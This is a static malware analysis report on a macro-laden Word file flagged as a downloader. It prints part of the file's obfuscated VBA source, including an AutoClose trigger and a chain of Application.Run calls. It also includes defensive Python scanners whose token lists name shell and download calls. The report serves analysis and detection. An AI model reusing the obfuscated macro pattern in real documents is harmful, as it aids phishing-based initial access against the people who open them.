Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 3242a4619e62c021…

MALICIOUS

Office (OOXML)

Size: 59.3 KB
Created: 2017-11-29 23:43:00 UTC
Authoring application: Microsoft Office Word 16.0000
First seen: 2019-09-30
MD5: a681c2e270cf7eee52734f2b15bbb581
SHA-1: c297c8b395efd97be4812059ef0e9e6d5cd95c4f
SHA-256: 3242a4619e62c021efaad36a702329f1385b709cc65aaf66c335b8ff8a3764fb
Risk score: 262

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1566.001 Phishing: Spearphishing Attachment

This OOXML document carries a VBA project whose module defines an AutoClose routine, an auto-execution entry point that fires when the document is closed, so the victim only has to open and then dismiss the file. The heuristics also flag a CreateObject call in the project (it is not visible in the source excerpt below, which is truncated). What is visible is built almost entirely of junk statements (string concatenation through Left/LTrim/RTrim and floating-point arithmetic on Atn() results, assigned to variables that are never read) surrounding a chain of Application.Run calls that hands control from one randomly named Sub to the next, plus a helper function that simply wraps Replace(), which is consistent with an obfuscated command string being reassembled at run time. The VBA macro and the AutoClose trigger together point to a maldoc intended for initial access via a spearphishing attachment. The routine the chain finally reaches, and the payload it executes, lie in the truncated part of the source and cannot be read from the excerpt, so the sample is classified as 'unknown family' even though the ClamAV signature name hints at a downloader.

Heuristics (6)

  • ClamAV: Doc.Malware.Emooodldr-6711604-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Emooodldr-6711604-0
  • VBA project inside OOXML medium 3 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    The project defines an auto-execution routine that runs when the document is closed. In the decoded source it is spelled AutoClose, the Word auto-macro name; the heuristic label uses the Excel spelling Auto_Close, and detection logic should match both.
  • CreateObject call high OLE_VBA_CREATEOBJ
    The project calls CreateObject, the usual way VBA instantiates COM objects (for example WScript.Shell, MSXML2.XMLHTTP or Scripting.FileSystemObject) to run commands, download files or write to disk. Which ProgID this sample passes is not visible in the excerpt.
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. Every URL listed here is an XML namespace identifier that Word writes into its OOXML parts (document.xml and related parts), so they name markup schemas rather than network destinations. They appear in practically every Word document and must not be treated as indicators of compromise; the real download location, if any, would be in the truncated macro code, not in this list.
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartex (in document text: OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006 (in document text: OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships (in document text: OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/math (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing (in document text: OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing (in document text: OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordml (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordml (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symex (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordml (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape (in document text: OOXML body / shared strings)
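The OLE_VBA_PCODE_AUTOEXEC_EXEC heuristic above matters because attackers sometimes ship a project whose source modules are stripped or corrupted while the compiled p-code still runs. The following is an added example, not the report's own scanner or oletools code: it opens an OOXML container as a ZIP, pulls out vbaProject.bin and searches its raw bytes (ASCII and UTF-16LE) for an auto-execution name together with an execution or download token, without decompressing the source streams. The token lists, the constructed container and the fake project blob are all assumptions made for the demonstration; a production check would use olevba, which also decompresses and parses the real streams.

```python
import io
import zipfile

# Token lists modelled on the OLE_VBA_PCODE_AUTOEXEC_EXEC heuristic described
# above. The scanner's real lists are not on the page; these are assumed values.
AUTOEXEC_TOKENS = ("AutoOpen", "Auto_Open", "AutoClose", "Auto_Close",
                   "AutoExec", "Document_Open", "Document_Close", "Workbook_Open")
EXEC_TOKENS = ("CreateObject", "Shell", "WScript.Shell", "URLDownloadToFile",
               "XMLHTTP", "Application.Run")


def _encodings(token: str):
    # Identifiers in the compiled/cache streams may be stored as ASCII or
    # as UTF-16LE, so both byte forms are searched.
    return (token.encode("ascii"), token.encode("utf-16-le"))


def find_tokens(blob: bytes, tokens) -> list:
    """Tokens present in the raw bytes in either encoding. VBA identifiers are
    case-insensitive, so the comparison is done on lower-cased bytes
    (bytes.lower() only touches ASCII letters, leaving UTF-16 NULs intact)."""
    lowered = blob.lower()
    return [tok for tok in tokens
            if any(enc.lower() in lowered for enc in _encodings(tok))]


def scan_ooxml(data: bytes) -> dict:
    """Find vbaProject.bin inside an OOXML container (a ZIP) and scan its raw
    bytes without decompressing the source modules. Returns the part name, the
    token hits and whether the auto-exec + exec combination is present."""
    result = {"vba_part": None, "autoexec": [], "exec": [], "suspicious": False}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        # Word/Excel/PowerPoint keep the project under word/, xl/ or ppt/.
        for name in zf.namelist():
            if name.lower().endswith("vbaproject.bin"):
                blob = zf.read(name)
                result["vba_part"] = name
                result["autoexec"] = find_tokens(blob, AUTOEXEC_TOKENS)
                result["exec"] = find_tokens(blob, EXEC_TOKENS)
                break
    # Fire only on the combination: an entry point plus something that runs
    # code or reaches out. Either alone is common in benign projects.
    result["suspicious"] = bool(result["autoexec"]) and bool(result["exec"])
    return result


def build_sample_docx(vba_blob: bytes) -> bytes:
    """Constructed minimal macro-enabled container (not the analysed sample)
    so the scanner can be exercised offline."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        zf.writestr("word/vbaProject.bin", vba_blob)
    return buf.getvalue()


# Constructed stand-ins for a compiled VBA project: a CFB magic prefix and
# identifier strings as a cache stream might carry them. Not real p-code.
FAKE_VBA = (b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 16
            + "AutoClose".encode("utf-16-le") + b"\x00" * 8
            + b"CreateObject" + b"\x00" * 8
            + "Application.Run".encode("utf-16-le"))
BENIGN_VBA = (b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 16
              + b"FormatReport" + b"\x00" * 8
              + "Worksheet_Change".encode("utf-16-le"))

if __name__ == "__main__":
    print(scan_ooxml(build_sample_docx(FAKE_VBA)))
```

On a real file, call scan_ooxml(open(path, "rb").read()); a hit on an auto-exec name alone (a benign template with AutoOpen) is not enough, which is why the verdict requires both token classes, mirroring the heuristic's wording.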

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 13483 bytes
SHA-256: 852c778f2962e76eb2024b34c24168ce14beb34ee6f35c7fb2270dbc0a5af2fe
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub ddZSINbyLKwgMY()
  jrSzDKTG = "OFwYJIXWrfWMrJ" + "FScoCYcSLSOk" + "vpLGVFSiYZ"
bNjBzGZYny = Left("bMpoWMnrQy", 1) + Left("fncPKLxQAX", 7) + "CdCnXpXHJUZKJpB"
HCRxVLyo = LTrim("dGvFSzMKbwFWGWFNYqXUkXBO") + "kxqjCRGuF" + "LpANOKLYgKBwF"
  Application.Run "nRKqqScIPcPJCP"
  IjcIGTbzHu = Atn(905.95) - 93.34 - 960.61 - 848.22
wRwQBOFw = Atn(853.64) + 441.88 + 732.54 + Atn(441.98) + 790.2 + Atn(496.3) + 778.85
NuSZHuWpk = Atn(155.21) + Atn(986.24) + Atn(626.62) + Atn(546.44)
VgoojDpOn = Atn(229.83) + Atn(408.36) + 725
kCWuRLkVc = RTrim("CD") + "oioIqZDFIMzMOxjVJ" + "OzCwcBZPYSpIFiUp"
End Sub
Sub ydTknTgvZjPYEr()
  XkIrzMB = Left("xAAuvOcriq", 6) + Left("LufbpovRKG", 6) + Left("oUGBEIpPuR", 4) + "fRpSXCGjdbOOcn"
ZucuWWIAyYz = RTrim("oxzpvkXjnfDLLdJGiFCcxFH") + "gfkzHHUMiFPywLnV" + "pISCSxQEMkQBqgdjEOuVXoOICggGHC" + LTrim("YnbKzcNiKEVCVDEuUvcLRRApzvkcVM")
UPXvrnyjZQQ = 324.1 - Atn(739.39) - 574.45 - 47.12
  Application.Run "PbjBzYLOLMBpkWS"
  BQPRdwE = 619.2 - 267.25 - 320.55 - 746.51 - 13.22 - 91.29
jKoOIfyvf = 383.42 - Atn(546.64) - Atn(831.27) - 708.41
gQzjxrYxDfx = 303.37 + Atn(867.65)
oGNGYUj = "IibEjgcpUGKIXNM" + "DNVEWU" + Left("uGOrDOvNSV", 3) + Left("ZkURCkFKwR", 4)
End Sub

Public Function RFDTUEwyjriOCQBKnE(dUndMyuPdHjBEWQv, zTjFCAfvggUFOYOfzJ, qEkgWfkEAEPVITD)
  ZpVGjOBnkA = Atn(262.42) - 604.22 - 944.82 - Atn(750.29)
xiHzPZXTY = RTrim("EdJUf") + LTrim("YqccxT")
QxIFcEASMjY = "zEFVBfIS" + "jICHBMEYRoNMSVBrIZGL" + "wuMNqVqZVKf" + "VdMy" + "fSwCrVOpH" + "f"
HTDjyZDq = "NJHFwLrKRwnF" + Left("jnnTCcPKff", 6) + "MVTfOuoDPvoY" + Left("kYPMVByYRW", 4) + Left("vxOVizouui", 9)
rnnOipzXfGJ = 944.49 - 706.68 - Atn(451.95) - Atn(397.13) - Atn(263.6)
jvBHGBEpF = 549.3 + 28.35 + 459.34 + 559.35 + Atn(548.23)
RurboUUz = RTrim("jzRyWkENCbqMKWH") + "IXNuWjRnITU"
MTEqJJkWATR = 734.46 + 800.64 + 190.37 + 627 + Atn(327.37) + 9.83 + 894.21
  RFDTUEwyjriOCQBKnE = Replace(dUndMyuPdHjBEWQv, zTjFCAfvggUFOYOfzJ, qEkgWfkEAEPVITD)
  njWOzxyWU = 589.87 + Atn(364.13)
UwFJoYziT = 923.4 + 695.65 + Atn(106.51)
SEYgGMSzbZZ = Atn(25.86) - 202.78 - Atn(754.36) - Atn(146.7) - 349.39
  AFXrBzU = "HB" + "VVVV" + "Fp"
HqMPUMIbdbT = 455.72 - Atn(376.14) - Atn(310.6) - 978.82
gvyqqpv = "JNI" + "EuPxWgHgcvcPFv" + "XjMpDrLvUVWN" + Left("FIWbjPPXSw", 8)
KLPDoAYPuHy = "d" + LTrim("FHVivBQk") + RTrim("WEMfAKVycJ") + "MFfAGkUWAqiTcoqxHRrdRBJZWY"
yIbroIwObL = "ZpoEziGZHfWfyiU" + LTrim("GMOBVzPQOiNfRjgA") + LTrim("cfzpinQxuZCWSw")
woXoiMXxV = Atn(413.71) + 602.92
  QPWzjUoy = "bLiYrdEDyJ" + Left("UiAzVOipbp", 3)
nMIykCiVqLF = "ITLciczkZBcnkOqygYuKRNUvNipo" + "MHL" + "FHuAynIYTjTcZLWHADjgqSvGczTAV" + "zJROMozJvVMRyWGpDZvxO"
INvwXbAViJz = Atn(579.19) + Atn(932.47) + 587.75 + Atn(890.5) + Atn(682.68) + Atn(308.76)
MTNOKVGFKSjC = RTrim("SDTTWckJHpQiMdvbGY") + "Wb" + RTrim("WOzYLjyCYErYCqHDAjqNGGQLfw")
MkGqETkKMfN = LTrim("HIZwCZXCTCckwTGUcrzHDEVPS") + RTrim("OMWdLnuIrMczPfgfTKWL") + LTrim("qwrHCIqHnCUVIPjiBSCwWDVnO")
rzobwTCiE = "ANT" + Left("vRKXuGKEZI", 2) + "HwwWoFoIFNkBMi"
End Function

Sub nRKqqScIPcPJCP()
  ZYxVyBXKBKDC = 908.28 - 327.6
xnWEzNCEvrDX = 134.94 - 84.76 - Atn(133.43)
FYVxXIE = Atn(822.94) - 735.52
fnAfNzn = 408.52 + Atn(747.31) + Atn(670.75) + 21.82 + 143.98 + 882.19 + Atn(578.95)
zkkGwKf = Atn(329.1) + 477.2 + 146.8 + Atn(181.37) + 925.23 + 221.33
  Application.Run "wzFUOFOLziqcvN"
  XHWSqcN = 96.71 + Atn(62.2) + 260.69 + 910.52 + Atn(729.88)
KOIPSPCLVqyR = 580.9 + 530.51 + Atn(463.22) + 597.85
yJwguqzuxj = LTrim("xBPFikHkGOGBbLRJvWWzTWYbALF") + "OgISkDzKWHJgHiJJqrqoE" + LTrim("VnYNrNFxnpfYvfZ") + LTrim("YKJAdRFyDd")
End Sub
Sub AutoClose()
  xMQZXqKOQrTc = Atn(664.2) - Atn(589.48)
fTjxYzRV = RTrim("pyikV") + LTrim("pAwdUnLZIRBXFDFWqYuwT") + RTrim("MHZGUvJxNgIACNWwRFZnZBRHMNTI")
yOxPRkuJg = "jNBMcVoxNHrvF
... (truncated)
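Most of the decoded source above is padding: assignments to variables that are never read, built from string literals passed through Left/LTrim/RTrim and from arithmetic on Atn() results. An analyst's first step is to throw that away and keep only the control flow. The block below is an added example, not part of the report's tooling, and it runs on a constructed excerpt that reproduces a subset of the lines shown above (the full module is truncated on the page). It drops assignments whose right-hand side is pure literal/no-op arithmetic, keeps procedure boundaries and calls, and follows the Application.Run chain until it reaches a name that is not defined in the excerpt. The junk-statement regex is an assumption tuned to this sample's patterns and would need adjusting for other families.

```python
import re

# Constructed excerpt reproducing the structure of the macro source shown in
# this report (names and junk expressions as on the page). It is a fragment:
# the module is truncated on the page, so AutoClose's body is not included.
MACRO_EXCERPT = '''
Sub ddZSINbyLKwgMY()
  jrSzDKTG = "OFwYJIXWrfWMrJ" + "FScoCYcSLSOk" + "vpLGVFSiYZ"
bNjBzGZYny = Left("bMpoWMnrQy", 1) + Left("fncPKLxQAX", 7) + "CdCnXpXHJUZKJpB"
  Application.Run "nRKqqScIPcPJCP"
  IjcIGTbzHu = Atn(905.95) - 93.34 - 960.61 - 848.22
End Sub
Sub ydTknTgvZjPYEr()
  Application.Run "PbjBzYLOLMBpkWS"
jKoOIfyvf = 383.42 - Atn(546.64) - Atn(831.27) - 708.41
End Sub

Public Function RFDTUEwyjriOCQBKnE(dUndMyuPdHjBEWQv, zTjFCAfvggUFOYOfzJ, qEkgWfkEAEPVITD)
xiHzPZXTY = RTrim("EdJUf") + LTrim("YqccxT")
  RFDTUEwyjriOCQBKnE = Replace(dUndMyuPdHjBEWQv, zTjFCAfvggUFOYOfzJ, qEkgWfkEAEPVITD)
End Function

Sub nRKqqScIPcPJCP()
  ZYxVyBXKBKDC = 908.28 - 327.6
  Application.Run "wzFUOFOLziqcvN"
End Sub
'''

# A term is a no-op call seen in the sample (Atn/Left/LTrim/RTrim on
# literals), a string literal, or a number; junk is a + / - chain of terms.
# This pattern is an assumption fitted to this sample, not a general rule.
_TERM = r'(?:(?:Atn|Left|LTrim|RTrim)\([^()]*\)|"[^"]*"|-?\d+(?:\.\d+)?)'
JUNK_RHS = re.compile(r'^\s*' + _TERM + r'(?:\s*[+\-]\s*' + _TERM + r')*\s*$')
ASSIGN = re.compile(r'^\s*([A-Za-z_]\w*)\s*=\s*(.+)$')
PROC_HEAD = re.compile(r'^\s*(?:Public\s+|Private\s+)?(?:Sub|Function)\s+(\w+)')
APP_RUN = re.compile(r'Application\.Run\s+"([^"]+)"')


def is_junk(line: str) -> bool:
    """True for an assignment whose value is built only from inert terms."""
    m = ASSIGN.match(line)
    return bool(m) and bool(JUNK_RHS.match(m.group(2)))


def strip_junk(src: str) -> list:
    """Keep lines that carry behaviour: procedure boundaries, calls, and
    assignments whose RHS is not pure literal/no-op arithmetic (e.g. the
    Replace() wrapper's return value survives)."""
    return [ln for ln in src.splitlines() if ln.strip() and not is_junk(ln)]


def run_chain(src: str) -> dict:
    """Map each defined procedure to the names it invokes via Application.Run."""
    chain, current = {}, None
    for ln in src.splitlines():
        head = PROC_HEAD.match(ln)
        if head:
            current = head.group(1)
            chain.setdefault(current, [])
            continue
        for target in APP_RUN.findall(ln):
            chain.setdefault(current, []).append(target)
    return chain


def resolve(chain: dict, start: str) -> list:
    """Follow Application.Run edges from `start`. Stops at a name that is not
    defined in the excerpt (it lives in the truncated part) or on a cycle."""
    path, seen, cur = [start], {start}, start
    while chain.get(cur):
        nxt = chain[cur][0]
        path.append(nxt)
        if nxt in seen or nxt not in chain:
            break
        seen.add(nxt)
        cur = nxt
    return path


if __name__ == "__main__":
    print("\n".join(strip_junk(MACRO_EXCERPT)))
    print(resolve(run_chain(MACRO_EXCERPT), "ddZSINbyLKwgMY"))
```

On this excerpt the reduced listing is a dozen lines, and the chain from ddZSINbyLKwgMY ends at wzFUOFOLziqcvN, a name with no visible definition; that is exactly where the payload-bearing code sits in the truncated part, and where a dynamic run or olevba --deobf on the full module would have to pick up.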
Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: word/vbaProject.bin
Size: 38912 bytes
SHA-256: 87cb388e257fb42c3d3a2a928e99097c2c1edc20d97a3f8b2d9b2253a48e7889
Detection: ClamAV: Doc.Malware.Emooodldr-6711604-0
Obfuscation or payload: unlikely (this verdict is for the binary container itself; the decoded source in macros.bas is heavily padded with junk statements, as the preview above shows)